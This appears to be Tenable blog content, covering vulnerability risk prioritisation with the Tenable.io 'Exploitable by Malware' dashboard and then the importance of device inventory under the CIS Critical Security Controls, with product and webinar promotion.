Now that you are able to identify the assets that are the most exploitable, you can determine if the systems are exploitable by known malware or by exploit frameworks. The field called Exploitable by Malware means that the exploit is known to exist in the wild. When performing the threat analysis, I like to include this as a key factor in assessing the risk to the asset. When identifying the assets that are exploitable by malware, I try to understand why the asset has not been patched. All too often, systems are not getting patched due to inconsistent patch cycles, inadequate patch management solutions, and overall lack of understanding about how the applications process data. Gaining an understanding of an application’s business function and criticality to overall business needs will lead to a more successful vulnerability management program.

Recently, in a discussion session with a university customer, we identified over 50 servers that have been running for over 4 years with no notable user activity. We reviewed the vulnerability state of these systems, and they were not only exploitable by malware, but also by many of the exploit frameworks. As we discussed how these systems could be either patched or removed, we began to see a bigger problem in the network. Many of the servers that were running, were either underutilized or not used at all. We then discussed the mitigation strategies with IT operations and received a lot of pushback based on the fact that none of the current admins knew why the systems were online and who owned the systems. The customer ultimately choose to implement a lengthy review process with all department heads in an attempt to establish ownership.

Regardless of your approach to mitigating risks identified by Tenable.io﹘by applying patches, configuring mitigation controls, or operating system hardening﹘the first step is to clearly qualify the risks into actionable tasks and deliverables. Tenable.io provides information security professionals with the tools and resources needed to perform a detailed qualitative analysis of the risk that threatens business assets. The Exploitable by Malware dashboard provides insight into your current risk exposure to exploitable vulnerabilities for both malware and exploit frameworks.

The Exploitable by Malware dashboard provides insight into your current risk exposure to exploitable vulnerabilities for both malware and exploit frameworks

Try Tenable.io

Tenable.io provides accurate information on how well your organization is addressing security risks, and helps track improvements over time. Get a free trial of Tenable.io Vulnerability Management for 60 days.

Knowing what assets you have is arguably the single most important security control. If you don’t know about a server, desktop, laptop, mobile device or network device, how can you manage and secure it? For that matter, what about cloud instances, virtual machines, and containers?

Fewer than 50% of surveyed organizations have implemented automated controls to inventory the systems and devices connected to their networks

In Q4 of last year, Tenable and the Center for Internet Security (CIS) conducted a survey of 319 IT security decision makers at companies with more than 100 employees. We found that fewer than 50% of the surveyed organizations have implemented automated controls to inventory the systems and devices connected to their networks. I was alarmed by such low control adoption because, as the following table indicates, knowing what is on your network is an important control in virtually all security frameworks and compliance standards.

CIS Critical Security Controls

The CIS rates Inventory of Authorized and Unauthorized Devices as the most important security control

The CIS Critical Security Controls (formerly the SANS Top Twenty) is a prioritized list of security controls developed by an international community of security professionals and institutions. The CIS rates Inventory of Authorized and Unauthorized Devices as the most important security control. This prioritization is designed to guide organizations to:

invest first in controls that will provide the greatest risk reduction and protection against the most dangerous threat actors and that can be feasibly implemented in your computing environment.

The phrase “can be feasibly implemented in your computing environment” deserves additional discussion because “feasibly implemented” does not translate to “easily implemented.” The control’s more detailed description:

Actively manage (inventory, track, and correct) all hardware devices on the network so that only authorized devices are given access and unauthorized and unmanaged devices are found and prevented from gaining access

offers insight about potential implementation challenges.

Managing devices by policy

Are you identifying unauthorized devices and preventing them from accessing your network?

The question of “What do you have?” has been expanded to “Are you identifying unauthorized devices and preventing them from accessing your network?” Preventing unauthorized device access starts with a policy, and organization management must buy into the policy and define any allowable exceptions. Otherwise, the policy will likely be undermined when influential people complain that they can’t connect their personal devices to the network.

Controlling which devices can connect to your network delivers benefits to both security and IT teams. From a security perspective, having only authorized devices on your network allows you to actively manage them to detect and remediate unauthorized software, misconfigurations, vulnerabilities and malware. Benefits also accrue to the IT organization. Having only authorized devices on the network increases network availability and eliminates the break-fix costs that inevitably result from troubleshooting problems often associated with one-off, unauthorized devices.

After the policy is established, automated supporting controls must be implemented to achieve the control objective.

More information

The CIS Critical Security Controls include six sub-controls that support Inventory of Authorized and Unauthorized Devices. A detailed discussion of these sub-controls is beyond the scope of this blog – but not to worry. Tenable is hosting a webinar on May 3rd, and we will dive into the details, show you how Tenable can help, and answer questions. This webinar is the first of a five-part series that will explore each of the CIS Foundational Cyber Hygiene controls. Brian Ventura, a SANS community instructor, will be our expert guest presenter. Brian teaches a 2-day course: Critical Security Controls: Planning, Implementing and Auditing. He has also taught a 5-day course: Implementing and Auditing the Critical Security Controls – in Depth. In addition to presenting valuable content, we will reserve time for questions and answers.

Look for future blogs where I will discuss the remaining Foundational Cyber Hygiene controls:

• Inventory of authorized and unauthorized software
• Secure configurations for hardware and software
• Continuous vulnerability assessment and remediation
• Controlled use of administrative privileges